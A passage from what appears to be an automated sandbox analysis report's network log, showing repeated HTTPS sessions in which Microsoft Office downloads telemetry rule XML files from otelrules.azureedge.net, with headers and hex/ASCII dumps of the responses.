                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                      ETag: "0x8DC582BDF1E2608"
                                                                                                                                                      x-ms-request-id: 77d68196-001e-0066-56cc-45561e000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125950Z-1746fd949bdfg4slhC1EWR34t0000000014g00000000548d
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:51 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      138192.168.2.44990513.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:51 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:51 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1399
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                      ETag: "0x8DC582BE8C605FF"
                                                                                                                                                      x-ms-request-id: 4885a0d8-201e-0096-65c7-45ace6000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125951Z-1746fd949bdjzh7thC1EWR3g64000000015g00000000b8rv
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:51 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      139192.168.2.44990613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:51 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:51 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1362
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                      ETag: "0x8DC582BDF497570"
                                                                                                                                                      x-ms-request-id: b15ffdf0-e01e-0051-2acd-4584b2000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125951Z-1746fd949bddtfvqhC1EWRxbpg000000013g000000009da3
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:51 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      140192.168.2.44990713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:52 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:52 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1403
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                      ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                      x-ms-request-id: eed2a8f6-b01e-0001-60d2-4546e2000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125952Z-1746fd949bdlnsqphC1EWRurw0000000010000000000a93k
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:52 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      141192.168.2.44990813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:52 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:53 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1366
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                      ETag: "0x8DC582BEA414B16"
                                                                                                                                                      x-ms-request-id: 46703850-c01e-002b-03cc-456e00000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125953Z-1746fd949bdzd2qvhC1EWRcygw00000001200000000029by
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:53 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      142192.168.2.44990913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:53 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:53 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1399
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                      ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                      x-ms-request-id: a6a36225-101e-000b-71ce-455e5c000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125953Z-1746fd949bd54zxghC1EWRzre400000001m0000000001y8g
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:53 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      143192.168.2.44991013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:53 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:53 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1362
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                      ETag: "0x8DC582BEB256F43"
                                                                                                                                                      x-ms-request-id: 4f5c15a4-401e-0067-28ce-4509c2000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125953Z-1746fd949bdlnsqphC1EWRurw0000000014g000000004gkp
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:53 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      144192.168.2.44990213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:54 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:54 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1354
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                      ETag: "0x8DC582BE0662D7C"
                                                                                                                                                      x-ms-request-id: 8dafbd59-c01e-0034-0bce-452af6000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125954Z-1746fd949bdhk6hphC1EWRaw3c00000000wg00000000asnt
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:54 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      145192.168.2.44991113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:54 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:54 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1403
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                      ETag: "0x8DC582BEB866CDB"
                                                                                                                                                      x-ms-request-id: 77ea0a00-001e-0066-6ed3-45561e000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125954Z-1746fd949bddgsvjhC1EWRum2c00000001h0000000005ufz
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:55 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      146192.168.2.44991213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:54 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:55 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1366
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                      ETag: "0x8DC582BE5B7B174"
                                                                                                                                                      x-ms-request-id: 52797c88-801e-00ac-33cb-45fd65000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125955Z-1746fd949bdlqd7fhC1EWR6vt000000001a000000000afwu
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:55 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      147192.168.2.44991313.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:55 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:56 UTC494INHTTP/1.1 200 OK
